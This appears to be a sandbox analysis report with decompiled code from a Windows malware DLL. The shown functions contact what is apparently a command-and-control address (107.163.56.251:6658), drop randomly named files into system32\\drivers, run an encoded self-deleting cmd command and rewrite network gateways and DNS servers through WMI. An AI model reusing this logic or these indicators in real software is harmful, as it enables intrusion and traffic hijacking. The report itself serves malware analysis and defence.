            				_t48 = 0x100167d0;
            				wsprintfA( &_v1044, _t18);
            				_push(0);
            				_t22 = E100255A5(0, _t48,  &_v1043 + 0xff, _t63, _t66, _t55,  &_v1044);
            				__eflags = _a12;
            				if(_a12 != 0) {
            					Sleep(0x7d0);
            					0x10041059(_a12);
            					__eflags = _t22 & 0xc3c95b5f;
            					return _t22;
            				}
            				return _t22;
            			}


























            0x10008656
            0x10008656
            0x10008656
            0x10008661
            0x1000867b
            0x10008680
            0x10008682
            0x1000868c
            0x10008692
            0x10008695
            0x100086a3
            0x100086aa
            0x100086b5
            0x100086bb
            0x100086c3
            0x100086c7
            0x100086cf
            0x100086d0
            0x100086d8
            0x100086de
            0x100086de
            0x100086e1
            0x100086e8
            0x100086e9
            0x100086ed
            0x100086ef
            0x100086f1
            0x100086f7
            0x100086f7
            0x100086fa
            0x100086ff
            0x10008705
            0x10008707
            0x10008713
            0x10008713
            0x10008715
            0x10008715
            0x10008724
            0x10008731
            0x10008733
            0x10008740
            0x10008753
            0x1000875f
            0x10008766
            0x1000876d
            0x10008770
            0x10008771
            0x10008772
            0x10008773
            0x10008775
            0x10008776
            0x1000877a
            0x1000877f
            0x10008782
            0x10008783
            0x1000878f
            0x1000878f
            0x1000879b
            0x100087a8
            0x100087b4
            0x100087c0
            0x100087cf
            0x100087d6
            0x100087e2
            0x100087e9
            0x100087f5
            0x100087f5
            0x100087f9
            0x100087fc
            0x10008801
            0x00000000
            0x10008801
            0x10008695
            0x10008812
            0x10008818
            0x1000881a
            0x10008826
            0x10008827
            0x1000882c
            0x10008835
            0x10008844
            0x10008847
            0x1000884c
            0x1000884f
            0x10008856
            0x1000885f
            0x10008864
            0x00000000
            0x10008864
            0x10008868

            APIs
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 100059AE
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 100059FB
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A08
              • Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A19
            • Sleep.KERNEL32(00000000,100168D4,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100086F1
            • CreateThread.KERNEL32(00000000,00000000,10008578,00000000,00000000,00000000), ref: 10008713
            • CreateThread.KERNEL32(00000000,00000000,10006EE7,00000000,00000000,00000000), ref: 10008724
            • Sleep.KERNEL32(000003E8,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008731
            • CreateThread.KERNEL32(00000000,00000000,10006B30,107.163.56.251:6658,00000000,00000000), ref: 10008753
            • CreateThread.KERNEL32(00000000,00000000,10008208,00000000,00000000,00000000), ref: 1000875F
            • Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008766
            • CreateThread.KERNEL32(00000000,00000000,10007112,00000000,00000000,00000000), ref: 1000878F
            • CreateThread.KERNEL32(00000000,00000000,1000827D,00000000,00000000,00000000), ref: 1000879B
            • Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087A8
            • CreateThread.KERNEL32(00000000,00000000,1000490F,00000000,00000000,00000000), ref: 100087B4
            • CreateThread.KERNEL32(00000000,00000000,10006EEF,00000000,00000000,00000000), ref: 100087C0
            • Sleep.KERNEL32(000927C0,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087D6
            • CreateThread.KERNEL32(00000000,00000000,10006A7F,00000000,00000000,00000000), ref: 100087E2
            • Sleep.KERNEL32(00001388,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087E9
            • CreateThread.KERNEL32(00000000,00000000,1000842D,00000000,00000000,00000000), ref: 100087F5
            • Sleep.KERNEL32(000000FF,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087F9
            • Sleep.KERNEL32(0036EE80,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008801
            • wsprintfA.USER32 ref: 10008835
            • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008856
            Strings
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateThread$Sleep$wsprintf
            • String ID: 107.163.56.251:6658$123$F896SD5DAE$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
            • API String ID: 2554219641-707305509
            • Opcode ID: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
            • Instruction ID: 562cb21c62d1d749736fc9fe061952e86694a01f598b035fd930608b54173050
            • Opcode Fuzzy Hash: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
            • Instruction Fuzzy Hash: 8B51BEE150435CBEF710E7788CC5EBB3A9CEF442D9F11092AF255A508ADFB4AD408A76
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 40%
            			E100053B7(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
            				intOrPtr _v8;
            				void _v71;
            				char _v72;
            				void _v331;
            				char _v332;
            				void _v591;
            				char _v592;
            				void _v851;
            				char _v852;
            				void _v4947;
            				signed char _v4948;
            				void* __edi;
            				void* __esi;
            				void* __ebp;
            				int _t82;
            				int _t86;
            				int _t88;
            				CHAR* _t104;
            				void* _t118;
            				signed int _t120;
            				signed int _t122;
            				signed int _t124;
            				signed int _t126;
            				signed int _t128;
            				signed int _t130;
            				CHAR* _t132;
            				CHAR* _t136;
            				CHAR* _t138;
            				intOrPtr _t142;
            				signed int _t147;
            				signed int _t151;
            				void* _t155;
            				void* _t157;
            				signed int _t158;
            				signed int _t162;
            				signed int _t163;
            				signed int _t164;
            				signed int _t165;
            				signed int _t166;
            				signed int _t167;
            				void* _t168;
            				int _t169;
            				void* _t170;
            				int _t183;
            				intOrPtr _t186;
            				void* _t198;
            				void* _t199;
            				void* _t202;
            				intOrPtr _t204;
            				void* _t205;
            				void* _t206;
            				signed int _t216;
            				void* _t220;
            
            				_t220 = __fp0;
            				_t170 = __edx;
            				_t144 = __ecx;
            				E1000CD20(0x1350, __ecx);
            				if(_a12 != 0) {
            					_t82 =  *0x10015fb8; // 0x0
            					_t202 =  *((intOrPtr*)(_a8 + 0xc)) - _t82;
            					_t183 = 0;
            					__eflags = 0;
            					do {
            						_push(_t82 + 0xfffffffe);
            						_push(_a4 + _t183);
            						_push( *0x10015fc8);
            						_t86 = E1000CDA6(_a4 + _t183, _t144, _t170, __eflags);
            						_t206 = _t206 + 0xc;
            						__eflags = _t86;
            						_t82 =  *0x10015fb8; // 0x0
            						if(_t86 == 0) {
            							_t183 = _t183 + _t82 - 1;
            						}
            						_t183 = _t183 + 1;
            						__eflags = _t183 - _t202;
            					} while (__eflags <= 0);
            				} else {
            					_t204 =  *0x1000e1b8;
            					_t142 =  *0x1000e248;
            					_t186 =  *((intOrPtr*)(_a8 + 0xc)) -  *0x10015fb8;
            					_t4 =  &_a12;
            					 *_t4 = _a12 & 0x00000000;
            					_t216 =  *_t4;
            					_v8 = _t186;
            					do {
            						_t88 =  *0x10015fb8; // 0x0
            						_push(_t88 - 1);
            						_push(_a12 + _a4);
            						_push( *0x10015fc8);
            						_t82 = E1000CDA6(_a4, _a12 + _a4, _t170, _t216);
            						_t206 = _t206 + 0xc;
            						_t217 = _t82;
            						if(_t82 == 0) {
            							_v72 = _v72 & _t82;
            							_t147 = 0xf;
            							memset( &_v71, _t82, _t147 << 2);
            							asm("stosw");
            							asm("stosb");
            							wsprintfA( &_v72, "%s\\%s", 0x100165a4, 0x100165a8);
            							_v4948 = _v4948 & 0x00000000;
            							memset( &_v4947, 0, 0x3ff << 2);
            							asm("stosw");
            							asm("stosb");
            							E10005318(0, _t217,  &_v4948);
            							_v852 = _v852 & 0x00000000;
            							_t151 = 0x40;
            							_v592 = _v592 & 0x00000000;
            							memset( &_v851, 0, _t151 << 2);
            							asm("stosw");
            							asm("stosb");
            							_push(0x40);
            							memset( &_v591, 0, 0 << 2);
            							asm("stosw");
            							asm("stosb");
            							wsprintfA( &_v852, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
            							_push(0x100165a8);
            							_t104 = E10001000(0, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz");
            							_t155 = 0x100165a4;
            							wsprintfA( &_v592, _t104);
            							_push(0);
            							_push( &_v852);
            							E1002B8D2(_t142, _t155, _t170, 0x100165a4, _t204);
            							asm("cdq");
            							E1000443D( &_v4948, _t142, _t155, _t170,  &_v4948,  &_v592);
            							_pop(_t157);
            							E10021A45( *_a8 + _a12, _t142, _t157, _t170, 0x100165a4, _t204, _t217);
            							_v332 = _v332 & 0x00000000;
            							_t158 = 0x40;
            							_t118 = memset( &_v331, 0, _t158 << 2);
            							asm("stosw");
            							asm("stosb");
            							0x1003a38c(_t142, 0, _t170,  *0x10015ff4,  *_a8 + _a12,  &_v72, 9, 0);
            							E100274E5(_t118, _t142, _t170, _t204, _t205, _t217);
            							_t120 = rand();
            							asm("cdq");
            							_t162 = 0x18;
            							_t198 = 0x61;
            							_t122 = rand();
            							asm("cdq");
            							_t163 = 0x19;
            							_t124 = rand();
            							asm("cdq");
            							_t164 = 0x17;
            							_t126 = rand();
            							asm("cdq");
            							_t165 = 0x19;
            							_t128 = rand();
            							asm("cdq");
            							_t166 = 0x18;
            							_t130 = rand();
            							asm("cdq");
            							_t167 = 0x19;
            							_t170 = _t130 % _t167 + _t198;
            							_t132 = E10001000(_t167, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj");
            							_t168 = _t170;
            							wsprintfA( &_v332, _t132);
            							_t206 = _t206 + 0x8c;
            							_t136 =  &_v332;
            							0x10036371(0x40000000, 1, 0, 2, 0, 0, _t128 % _t166 + _t198, _t126 % _t165 + _t198, _t124 % _t164 + _t198, _t122 % _t163 + _t198, _t120 % _t162 + _t198, 0, _t118);
            							_t199 = _t136;
            							_push(_t136);
            							_push(_t170);
            							E10023C7B(_t136, _t142, _t168, _t199, _t204, 0);
            							Sleep(0x3e8);
            							_t138 =  &_v332;
            							_push(_t138);
            							_push(_t138);
            							E1002EC87(_t138, _t142, _t168, 0);
            							_t169 =  *0x10015fb8; // 0x0
            							_t186 = _v8;
            							_t82 = _a12 + _t169 - 1;
            							_a12 = _t82;
            						}
            						_a12 = _a12 + 1;
            					} while (_a12 <= _t186);
            				}
            				return _t82;
            			}
























































            0x100053b7
            0x100053b7
            0x100053b7
            0x100053bf
            0x100053ca
            0x100055e9
            0x100055ee
            0x100055f0
            0x100055f0
            0x100055f2
            0x100055f5
            0x100055fb
            0x100055fc
            0x10005602
            0x10005607
            0x1000560a
            0x1000560c
            0x10005611
            0x10005613
            0x10005613
            0x10005617
            0x10005618
            0x10005618
            0x100053d0
            0x100053d3
            0x100053da
            0x100053e3
            0x100053e9
            0x100053e9
            0x100053e9
            0x100053ed
            0x100053f0
            0x100053f0
            0x100053f9
            0x100053ff
            0x10005400
            0x10005406
            0x1000540b
            0x1000540e
            0x10005410
            0x10005416
            0x1000541b
            0x1000541f
            0x10005421
            0x10005423
            0x10005437
            0x10005439
            0x1000544d
            0x1000544f
            0x10005451
            0x10005459
            0x1000545e
            0x10005467
            0x10005470
            0x10005477
            0x10005479
            0x1000547b
            0x1000547c
            0x10005487
            0x10005489
            0x1000548b
            0x1000549e
            0x100054a3
            0x100054ae
            0x100054b3
            0x100054bc
            0x100054c7
            0x100054c9
            0x100054ca
            0x100054cf
            0x100054de
            0x100054e7
            0x100054fc
            0x10005502
            0x1000550b
            0x10005516
            0x10005518
            0x1000551a
            0x1000551c
            0x10005523
            0x1000552a
            0x1000552e
            0x1000552f
            0x10005534
            0x10005538
            0x1000553c
            0x1000553d
            0x10005543
            0x10005547
            0x10005548
            0x1000554e
            0x10005552
            0x10005553
            0x10005559
            0x1000555d
            0x1000555e
            0x10005564
            0x10005568
            0x10005569
            0x1000556c
            0x10005574
            0x10005579
            0x10005582
            0x10005584
            0x10005590
            0x1000559c
            0x100055a1
            0x100055a2
            0x100055a3
            0x100055a4
            0x100055ae
            0x100055b4
            0x100055ba
            0x100055bb
            0x100055bc
            0x100055c4
            0x100055ca
            0x100055cd
            0x100055d1
            0x100055d1
            0x100055d4
            0x100055d7
            0x100055e0
            0x1000561f

            APIs
            • wsprintfA.USER32 ref: 10005437
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
              • Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0
            • wsprintfA.USER32 ref: 1000549E
            • wsprintfA.USER32 ref: 100054BC
            • PrintFile.ABC(?,?,?,00000000), ref: 100054DE
            • rand.MSVCRT ref: 1000552A
            • rand.MSVCRT ref: 10005538
            • rand.MSVCRT ref: 10005543
            • rand.MSVCRT ref: 1000554E
            • rand.MSVCRT ref: 10005559
            • rand.MSVCRT ref: 10005564
            • wsprintfA.USER32 ref: 10005582
            • Sleep.KERNEL32(000003E8,?,00000000,40000000,00000001,00000000,00000002,00000000,00000000,?,?,?,?,00000009,00000000,?), ref: 100055AE
            Strings
            • %s\%s, xrefs: 10005431
            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
            • c:\windows\system32\drivers\%s, xrefs: 10005498
            Memory Dump Source
            • Source File: 00000012.00000002.289402853.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000012.00000002.289398538.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289411544.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289417468.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289423101.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289442215.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000012.00000002.289452058.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_18_2_10000000_rundll32.jbxd
            Similarity
            • API ID: rand$InitializeThunkwsprintf$FilePrintSleep
            • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
            • API String ID: 3997227624-455112146
            • Opcode ID: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
            • Instruction ID: 64546e9388752df838bc4033515aa0a8afcfc879ecc6bfc3b3dc2cd959c3d1fd
            • Opcode Fuzzy Hash: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
            • Instruction Fuzzy Hash: 0D610873A40258BFEB10DB64CC46FDF77ADEB84351F184466F604AB180CBB5EA818A64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 55%
            			E1000721F(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags, void* __fp0) {
            				void* _t141;
            				void* _t142;
            				intOrPtr* _t150;
            				intOrPtr _t151;
            				intOrPtr* _t152;
            				intOrPtr _t153;
            				intOrPtr* _t160;
            				intOrPtr _t161;
            				void* _t162;
            				intOrPtr* _t164;
            				intOrPtr _t165;
            				intOrPtr* _t170;
            				intOrPtr _t171;
            				intOrPtr _t173;
            				intOrPtr _t177;
            				intOrPtr _t178;
            				intOrPtr* _t183;
            				intOrPtr _t184;
            				intOrPtr* _t188;
            				intOrPtr _t189;
            				intOrPtr* _t193;
            				intOrPtr* _t194;
            				void* _t196;
            				signed int _t201;
            				intOrPtr _t204;
            				void* _t209;
            				intOrPtr* _t210;
            				intOrPtr _t215;
            				intOrPtr* _t226;
            				intOrPtr* _t229;
            				intOrPtr* _t230;
            				intOrPtr* _t239;
            				intOrPtr* _t242;
            				intOrPtr* _t245;
            				intOrPtr _t256;
            				intOrPtr _t260;
            				intOrPtr* _t261;
            				void* _t266;
            
            				_t307 = __fp0;
            				_t272 = __eflags;
            				_t254 = __edi;
            				_t250 = __edx;
            				_t209 = __ebx;
            				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
            				_push(__esi);
            				E1000774B();
            				_push("IPEnabled=TRUE");
            				_push("Win32_NetworkAdapterConfiguration");
            				 *((intOrPtr*)(_t266 - 4)) = 0;
            				if(E100077B2(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t272, __fp0) == 0) {
            					L61:
            					_t215 = _t266 - 0x7c;
            					 *((intOrPtr*)(_t266 - 4)) = 0xb;
            					_t141 = E1002A8C6(E10007A27(_t215), _t209, _t215, _t250, _t254, _t266);
            					asm("cld");
            					 *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) =  *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) - 1;
            					asm("adc al, [eax]");
            					 *((intOrPtr*)(_t209 + 0x645ef44d)) =  *((intOrPtr*)(_t209 + 0x645ef44d)) + _t215;
            					 *0 = _t215;
            					return _t141;
            				} else {
            					_push(__edi);
            					 *((intOrPtr*)(_t266 - 0x14)) = 0;
            					 *((char*)(_t266 - 4)) = 1;
            					if( *((intOrPtr*)(_t266 - 0x68)) != 0) {
            						_t201 =  *((intOrPtr*)(_t266 - 0x64)) -  *((intOrPtr*)(_t266 - 0x68));
            						_t275 = _t201 & 0xfffffffc;
            						if((_t201 & 0xfffffffc) > 0) {
            							_push("Index");
            							_push(0);
            							_push(_t266 - 0x28);
            							_t254 = E10007A73(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t275, __fp0);
            							_t204 =  *_t254;
            							if(_t204 != 0) {
            								0x1003afbd(_t254, _t204 + 8);
            							}
            							E10007696(_t266 - 0x14);
            							 *((intOrPtr*)(_t266 - 0x14)) =  *_t254;
            							E10007696(_t266 - 0x28);
            						}
            					}
            					_t142 = E1000767F(_t266 - 0x14, _t250);
            					_t278 = _t142;
            					if(_t142 == 0) {
            						L59:
            						_t217 =  *((intOrPtr*)(_t266 - 0x14));
            						_pop(_t254);
            						if( *((intOrPtr*)(_t266 - 0x14)) != 0) {
            							E1000515C(_t142, _t217);
            							 *((intOrPtr*)(_t266 - 0x14)) = 0;
            						}
            						goto L61;
            					}
            					_push(_t209);
            					_push("Win32_NetworkAdapterConfiguration.Index=");
            					E1000504D(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
            					_t219 = _t266 - 0x18;
            					_push(_t266 - 0x14);
            					 *((char*)(_t266 - 4)) = 2;
            					_t142 = E1000762A(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
            					_t210 =  *0x1000e218;
            					 *((intOrPtr*)(_t266 - 0x10)) = 0;
            					 *((intOrPtr*)(_t266 - 0x28)) = 0;
            					if( *((intOrPtr*)(_t266 + 8)) != 0) {
            						_push( *((intOrPtr*)(_t266 + 8)));
            						_t142 = E1000CD02(_t219, 0);
            						_t280 = _t142;
            						_pop(_t219);
            						if(_t142 != 0) {
            							_t219 = _t266 - 0x7c;
            							_push(_t266 - 0x10);
            							_push("SetGateways");
            							_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t280, _t307);
            							_t281 = _t142;
            							if(_t142 >= 0) {
            								asm("stosd");
            								_t260 = 1;
            								 *((intOrPtr*)(_t266 - 0x38)) = 0;
            								_push( *((intOrPtr*)(_t266 + 8)));
            								 *((intOrPtr*)(_t266 - 0x3c)) = _t260;
            								E1000504D(_t210, _t266 - 0x24, _t250, _t260, 0, _t281, _t307);
            								_t170 =  *((intOrPtr*)(_t266 - 0x24));
            								 *((char*)(_t266 - 4)) = 3;
            								_t282 = _t170;
            								if(_t170 == 0) {
            									_t171 = 0;
            									__eflags = 0;
            								} else {
            									_t171 =  *_t170;
            								}
            								 *((intOrPtr*)(_t266 - 0x2c)) = _t171;
            								_t173 =  *_t210(8, _t260, _t266 - 0x3c);
            								_t261 =  *0x1000e230;
            								 *((intOrPtr*)(_t266 - 0x1c)) = _t173;
            								 *((intOrPtr*)(_t173 + 0xc)) = _t266 - 0x2c;
            								 *_t261(_t266 - 0x4c);
            								 *((intOrPtr*)(_t266 - 0x44)) =  *((intOrPtr*)(_t266 - 0x1c));
            								_t177 = 1;
            								 *((short*)(_t266 - 0x4c)) = 0x2008;
            								 *((intOrPtr*)(_t266 - 0x30)) = _t177;
            								_t178 =  *_t210(3, _t177, _t266 - 0x3c);
            								 *((intOrPtr*)(_t266 - 0x20)) = _t178;
            								 *((intOrPtr*)(_t178 + 0xc)) = _t266 - 0x30;
            								 *_t261(_t266 - 0x5c);
            								_push("DefaultIPGateway");
            								 *((short*)(_t266 - 0x5c)) = 0x2003;
            								 *((intOrPtr*)(_t266 - 0x54)) =  *((intOrPtr*)(_t266 - 0x20));
            								_t183 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8, _t250, _t261, 0, _t282, _t307)));
            								 *((char*)(_t266 - 4)) = 4;
            								_t283 = _t183;
            								if(_t183 == 0) {
            									_t184 = 0;
            									__eflags = 0;
            								} else {
            									_t184 =  *_t183;
            								}
            								_t239 =  *((intOrPtr*)(_t266 - 0x10));
            								 *((intOrPtr*)( *_t239 + 0x14))(_t239, _t184, 0, _t266 - 0x4c, 0);
            								 *((char*)(_t266 - 4)) = 3;
            								E10007696(_t266 + 8);
            								_push("GatewayCostMetric");
            								_t188 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8,  *_t239, _t266 - 0x4c, 0, _t283, _t307)));
            								 *((char*)(_t266 - 4)) = 5;
            								_t284 = _t188;
            								if(_t188 == 0) {
            									_t189 = 0;
            									__eflags = 0;
            								} else {
            									_t189 =  *_t188;
            								}
            								_t242 =  *((intOrPtr*)(_t266 - 0x10));
            								 *((intOrPtr*)( *_t242 + 0x14))(_t242, _t189, 0, _t266 - 0x5c, 0);
            								 *((char*)(_t266 - 4)) = 3;
            								E10007696(_t266 + 8);
            								_push("SetGateways");
            								_t193 =  *((intOrPtr*)(E1000504D(_t210, _t266 - 0x34,  *_t242, _t266 - 0x5c, 0, _t284, _t307)));
            								 *((char*)(_t266 - 4)) = 6;
            								if(_t193 == 0) {
            									 *((intOrPtr*)(_t266 + 8)) = 0;
            								} else {
            									 *((intOrPtr*)(_t266 + 8)) =  *_t193;
            								}
            								_t194 =  *((intOrPtr*)(_t266 - 0x18));
            								if(_t194 == 0) {
            									_t250 = 0;
            									__eflags = 0;
            								} else {
            									_t250 =  *_t194;
            								}
            								_t254 = _t266 - 0x28;
            								_t245 =  *((intOrPtr*)(_t266 - 0x78));
            								_t196 =  *((intOrPtr*)( *_t245 + 0x60))(_t245, _t250,  *((intOrPtr*)(_t266 + 8)), 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t254, 0);
            								_t246 =  *((intOrPtr*)(_t266 - 0x34));
            								if( *((intOrPtr*)(_t266 - 0x34)) != 0) {
            									E1000515C(_t196, _t246);
            								}
            								0x10035685(_t254,  *((intOrPtr*)(_t266 - 0x1c)));
            								 *_t254();
            								_t142 =  *_t254( *((intOrPtr*)(_t266 - 0x20)));
            								_t219 =  *((intOrPtr*)(_t266 - 0x24));
            								 *((char*)(_t266 - 4)) = 2;
            								if( *((intOrPtr*)(_t266 - 0x24)) != 0) {
            									_t142 = E1000515C(_t142, _t219);
            								}
            							}
            						}
            					}
            					if( *((intOrPtr*)(_t266 + 0xc)) == 0) {
            						L31:
            						if( *((intOrPtr*)(_t266 + 0x10)) == 0) {
            							L57:
            							_t220 =  *((intOrPtr*)(_t266 - 0x18));
            							_pop(_t209);
            							if( *((intOrPtr*)(_t266 - 0x18)) != 0) {
            								_t142 = E1000515C(_t142, _t220);
            								 *((intOrPtr*)(_t266 - 0x18)) = 0;
            							}
            							goto L59;
            						}
            						_push( *((intOrPtr*)(_t266 + 0x10)));
            						_t142 = E1000CD02(_t219, 0);
            						_t292 = _t142;
            						if(_t142 == 0) {
            							goto L57;
            						}
            						L33:
            						_push(_t266 - 0x10);
            						_push("SetDNSServerSearchOrder");
            						_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t292, _t307);
            						_t293 = _t142;
            						if(_t142 >= 0) {
            							_push( *((intOrPtr*)(_t266 + 0xc)));
            							asm("stosd");
            							asm("stosd");
            							asm("stosd");
            							 *((intOrPtr*)(_t266 - 0x58)) = 0;
            							 *((intOrPtr*)(_t266 - 0x5c)) = 2;
            							E1000504D(_t210, _t266 + 0xc, _t250, _t266 - 0x58, 0, _t293, _t307);
            							_push( *((intOrPtr*)(_t266 + 0x10)));
            							 *((char*)(_t266 - 4)) = 7;
            							E1000504D(_t210, _t266 + 8, _t250, _t266 - 0x58, 0, _t293, _t307);
            							_t150 =  *((intOrPtr*)(_t266 + 0xc));
            							 *((char*)(_t266 - 4)) = 8;
            							if(_t150 == 0) {
            								_t151 = 0;
            								__eflags = 0;
            							} else {
            								_t151 =  *_t150;
            							}
            							 *((intOrPtr*)(_t266 - 0x3c)) = _t151;
            							_t152 =  *((intOrPtr*)(_t266 + 8));
            							_t295 = _t152;
            							if(_t152 == 0) {
            								_t153 = 0;
            								__eflags = 0;
            							} else {
            								_t153 =  *_t152;
            							}
            							 *((intOrPtr*)(_t266 - 0x38)) = _t153;
            							_t256 =  *_t210(8, 1, _t266 - 0x5c);
            							 *((intOrPtr*)(_t256 + 0xc)) = _t266 - 0x3c;
            							 *0x1000e230(_t266 - 0x4c);
            							_push("DNSServerSearchOrder");
            							 *((short*)(_t266 - 0x4c)) = 0x2008;
            							 *((intOrPtr*)(_t266 - 0x44)) = _t256;
            							_t160 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t250, _t256, 0, _t295, _t307)));
            							 *((char*)(_t266 - 4)) = 9;
            							if(_t160 == 0) {
            								_t161 = 0;
            								__eflags = 0;
            							} else {
            								_t161 =  *_t160;
            							}
            							_t226 =  *((intOrPtr*)(_t266 - 0x10));
            							_t257 = _t266 - 0x4c;
            							_t251 =  *_t226;
            							_t162 =  *((intOrPtr*)( *_t226 + 0x14))(_t226, _t161, 0, _t266 - 0x4c, 0);
            							_t227 =  *((intOrPtr*)(_t266 + 0x10));
            							 *((char*)(_t266 - 4)) = 8;
            							_t297 =  *((intOrPtr*)(_t266 + 0x10));
            							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
            								E1000515C(_t162, _t227);
            							}
            							_push("SetDNSServerSearchOrder");
            							_t164 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 0x10, _t251, _t257, 0, _t297, _t307)));
            							 *((char*)(_t266 - 4)) = 0xa;
            							if(_t164 == 0) {
            								_t165 = 0;
            								__eflags = 0;
            							} else {
            								_t165 =  *_t164;
            							}
            							_t229 =  *((intOrPtr*)(_t266 - 0x18));
            							if(_t229 == 0) {
            								_t250 = 0;
            								__eflags = 0;
            							} else {
            								_t250 =  *_t229;
            							}
            							_t230 =  *((intOrPtr*)(_t266 - 0x78));
            							_t142 =  *((intOrPtr*)( *_t230 + 0x60))(_t230, _t250, _t165, 0, 0,  *((intOrPtr*)(_t266 - 0x10)), _t266 - 0x28, 0);
            							_t231 =  *((intOrPtr*)(_t266 + 0x10));
            							if( *((intOrPtr*)(_t266 + 0x10)) != 0) {
            								_t142 = E1000515C(_t142, _t231);
            								 *((intOrPtr*)(_t266 + 0x10)) = 0;
            							}
            							_t232 =  *((intOrPtr*)(_t266 + 8));
            							if( *((intOrPtr*)(_t266 + 8)) != 0) {
            								_t142 = E1000515C(_t142, _t232);
            								 *((intOrPtr*)(_t266 + 8)) = 0;
            							}
            							_t233 =  *((intOrPtr*)(_t266 + 0xc));
            							if( *((intOrPtr*)(_t266 + 0xc)) != 0) {
            								_t142 = E1000515C(_t142, _t233);
            								 *((intOrPtr*)(_t266 + 0xc)) = 0;
            							}
            						}
            						goto L57;
            					}
            					_push( *((intOrPtr*)(_t266 + 0xc)));
            					_t142 = E1000CD02(_t219, 0);
            					_pop(_t219);
            					if(_t142 != 0) {
            						goto L33;
            					}
            					goto L31;
            				}
            			}









































            0x1000721f
            0x1000721f
            0x1000721f
            0x1000721f
            0x1000721f
            0x10007224
            0x1000722c
            0x10007230
            0x10007237
            0x1000723c
            0x10007244
            0x1000724e
            0x100075fc
            0x100075fc
            0x100075ff
            0x1000760b
